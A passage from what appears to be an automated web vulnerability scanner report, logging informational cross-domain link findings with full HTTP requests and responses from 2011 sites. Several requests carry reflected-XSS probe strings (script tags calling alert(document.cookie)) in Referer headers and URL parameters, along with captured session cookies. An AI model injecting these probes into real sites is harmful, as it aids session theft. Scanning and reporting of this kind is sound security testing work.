...[SNIP]...
<img src='http://cdn.invisionpower.com/uploads/profile/photo-129656.jpg' width='50' height='50' class='photo left' style='margin:0px 6px 2px 0px' />
               
               <a href='http://www.skinbox.net/images/slider_viril_en.jpg' class='bbc_url' title='External link' rel='nofollow external'>http://www.skinbox.n...er_viril_en.jpg</a>
...[SNIP]...
<li class='row2' style='clear:both'>
                               <img src='http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs720.ash1/161672_516237797_6814474_q.jpg' width='25' height='25' alt='' class='photo' />
                               <div class='nexttophoto'>
...[SNIP]...
<li class='row1' style='clear:both'>
                               <img src='http://a3.twimg.com/profile_images/330590355/tyres_normal.jpg' width='25' height='25' alt='' class='photo' />
                               <div class='nexttophoto'>
...[SNIP]...

16.7. http://community.invisionpower.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.php?app=members&module=online&sort_order=desc HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:11:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8e60995e4e57109ea7bf03aec1105144; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:11:53 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 49348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<td class='row1'>
                   <img src='http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs236.ash2/49939_884805416_4751842_q.jpg' alt="JBlaze's Photo" width='50' height='50' class='photo' />
               </td>
...[SNIP]...

16.8. http://community.invisionpower.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?app=members&module=online&sort_key=name&sort_order=asc&show_mem=reg HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:12:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=ef6d5994fb4d69e650be91b583884fe3; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:12:18 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 56263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<td class='row1'>
                   <img src='http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs1281.snc4/173261_570812443_4547931_q.jpg' alt=".ScottM's Photo" width='50' height='50' class='photo' />
               </td>
...[SNIP]...
<td class='row1'>
                   <img src='http://profile.ak.fbcdn.net/hprofile-ak-sf2p/hs272.snc3/23189_1797591924_7869_q.jpg' alt="Alejandra's Photo" width='50' height='50' class='photo' />
               </td>
...[SNIP]...

16.9. http://docs.google.com/viewer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.google.com
Path:   /viewer

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /viewer?a=v&q=cache:HnheOWiiIDYJ:www.china-iwb.com/abcde/Editor/UploadFile/2009522165941674.pdf+ipboard+software&hl=en&gl=us&pid=bl&srcid=ADGEESjyYJa29MsXL3KdRyDbwVbi5X5naQMXdsesDyo2wlAiA3WBZFiy3Kln0XY5-A4CaZuPGkHdGCcCd5h1oqGmAgdcTRbKg_PrEIyNMECnLg_MHJwUja5ypPOjg_NW-JLLHoceMb4V&sig=AHIEtbQD9_H6fJ7WX7pFVSsc5vQ-6jB4kQ HTTP/1.1
Host: docs.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:02:02 GMT
Expires: Thu, 03 Feb 2011 01:02:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=5">
<script type="text/javascript">
(fun
...[SNIP]...
</a> <a target=_blank href="http://www.youtube.com/?tab=o1" class=gb2>YouTube</a>
...[SNIP]...
<a title="Back to Google Docs" href="//docs.google.com/"><img border="0" id="docs-logo" src="//ssl.gstatic.com/docs/common/logo/docs_logo_sm.gif" width="122" alt="Google Docs logo"></a>
...[SNIP]...

16.10. http://fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /fis/worldnews/worldnews.asp?monthyear=&day=25&id=40221&l=s&special=&ndb=1%20target= HTTP/1.1
Host: fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:54:38 GMT
Connection: close
Content-Length: 85564
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=BLGBFPGBOBOPPDLCDHNLOLLM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Noticias - Clean Seas recorta sus p..rdidas financier
...[SNIP]...
<td>
           <a href="http://www.fishbase.org/search.html" target="_blank">
               <img src="/fis/gif/nav/directory-s.jpg" border="0">
...[SNIP]...
<td>                                                                                <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=68727f58-180b-4533-bb75-9095c2c1f7b7&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...
<td align="center">
               <a href="http://twitter.com/FISinfo" target="_blank"><img src="/fis/gif/newnav/follow_twiter.gif" border="0">
...[SNIP]...
<td align="center">
               <a href="http://www.facebook.com/pages/Fish-Information-and-Services/228637974386?ref=ts" target="_blank"><img src="/fis/gif/newnav/follow_facebook.gif" border="0">
...[SNIP]...
<td align="center">
               <a href="http://www.youtube.com/FishInfoServices" target="_blank"><img src="/fis/gif/newnav/follow_youtube.gif" border="0">
...[SNIP]...

16.11. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.charterone.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Wed, 02 Feb 2011 21:59:52 GMT
Expires: Wed, 02 Feb 2011 21:59:52 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 493

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img border="0" src="http://r.turn.com/r/beacon?b2=gX2iQOUxtnHmRU47KaHireBgXSml7iqTWpMq6sC-bkfBLD_8Bpm0tGlg0hKb4nkI99t0_v7dGOPLnScMot5haQ&cid="><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=citizensvisited_cs=1&betq=11980=427813" width = "1" height = "1" border = "0"></body>
...[SNIP]...

16.12. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=1359940;type=sdlpb511;cat=irami744;ord=1;num=705732537899.1664? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Wed, 02 Feb 2011 22:21:30 GMT
Expires: Wed, 02 Feb 2011 22:21:30 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 761

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img border="0" src="http://r.turn.com/r/beacon?b2=K7KYhd4eE7v_2Pp4OsSZAqooIzVnh_wFA0dRmSlHRo32rehipFOWq4-uM4VOqKX91eZ2fWs61TJh5NUTYHHdVA&cid="><img src="http://d.xp1.ru4.com/activity?_o=632310&_t=ira" height="1" width="1" /><img src="http://ad.xplusone.com/pixel?id=938530&t=2" width="1" height="1" /><img src="http://ad.doubleclick.net/ad/x1.aud/bankofamerica/lp/ira;sz=1x1;ord=1234567?" width="1" height="1" border="0" alt="">
...[SNIP]...

16.13. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-8098918000470057&output=html&h=600&slotname=7289890631&w=160&lmt=1296717944&flash=10.1.103&url=http%3A%2F%2Fsearch.wareseeker.com%2Fip-boardc8b75%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E47d05c4592a%2F&dt=1296696344763&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296696344831&frm=0&adk=2700696303&ga_vid=1733661161.1296696345&ga_sid=1296696345&ga_hid=843384749&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1021&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F30&fu=0&ifi=1&dtd=244&xpc=vr7cyyiWrP&p=http%3A//search.wareseeker.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 01:32:42 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3952

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<font style="line-height:10px; font-size:9px" face="arial,sans-serif" color="#000000"><a target="_blank" href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://search.wareseeker.com/ip-boardc8b75%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E47d05c4592a/%26hl%3Den%26client%3Dca-pub-8098918000470057%26adU%3Dapps.foxtab.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEpP1Tt0tsFfE1EAxAc2NgfXit1og">Ads by Google</a>
...[SNIP]...

16.14. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-8098918000470057&output=html&h=600&slotname=7289890631&w=160&lmt=1296717944&flash=10.1.103&url=http%3A%2F%2Fsearch.wareseeker.com%2Fip-boardc8b75%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E47d05c4592a%2F&dt=1296696344763&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296696344831&frm=0&adk=2700696303&ga_vid=1733661161.1296696345&ga_sid=1296696345&ga_hid=843384749&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1021&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F30&fu=0&ifi=1&dtd=244&xpc=vr7cyyiWrP&p=http%3A//search.wareseeker.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 01:25:06 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4067

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<font style="line-height:10px; font-size:9px" face="arial,sans-serif" color="#000000"><a target="_blank" href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://search.wareseeker.com/ip-boardc8b75%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E47d05c4592a/%26hl%3Den%26client%3Dca-pub-8098918000470057%26adU%3Dwww.bigrebelads.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGmb-wLyVG7ggVWUZL83R4BfT2VEA">Ads by Google</a>
...[SNIP]...

16.15. http://groups.google.com/groups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /groups

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:02:49 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=631694ff1b7a6154:TM=1296694969:LM=1296694970:S=4NhZ0w32Gl9oo3YP; expires=Sat, 02-Feb-2013 01:02:50 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...
</b> <a href="http://www.youtube.com/?hl=en&q=ges&ie=UTF-8&tab=g1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.16. http://groups.google.com/groups  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /groups

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /groups?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:02:49 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=e926f912ca515f38:TM=1296694969:LM=1296694970:S=E8w6t86ziSjxKqqj; expires=Sat, 02-Feb-2013 01:02:50 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...
</b> <a href="http://www.youtube.com/?q=ipboard+software&ie=UTF-8&hl=en&tab=g1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.17. http://groups.google.com/grphp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /grphp?q=bluefin+tuna&hl=en&tab=ng HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=370264bb37da7941:TM=1296694971:LM=1296694971:S=uYPBuhaaOpwVpXkZ; expires=Sat, 02-Feb-2013 01:02:51 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 01:02:51 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</b> <a href="http://www.youtube.com/?hl=en&tab=g1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

16.18. http://homeloanhelp.bankofamerica.com/en/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://homeloanhelp.bankofamerica.com
Path:   /en/index.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /en/index.html?cm_sp=CRE-Mortgage-Refi-_-Home%20Loan%20Assistance%20Q3-_-MR16000S_marketing%20strip_%20ooo-123_hp_lahUmbrella-o HTTP/1.1
Host: homeloanhelp.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:31 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=2, max=6
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=44922ab53660;expires=Wed, 02-Feb-11 23:11:31 GMT;path=/
Content-Length: 20976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" dir="
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=1359940;type=enter782;cat=homep853;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

16.19. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /maps?hl\x3den\x26tab\x3dwl\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:03:13 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=7fb752ff1eae9efb:TM=1296694993:LM=1296694993:S=swmOsDNeS2X-oeUG; expires=Sat, 02-Feb-2013 01:03:13 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5Cx3den%5Cx26tab%5Cx3dwl%5Cx22=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_ALL/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
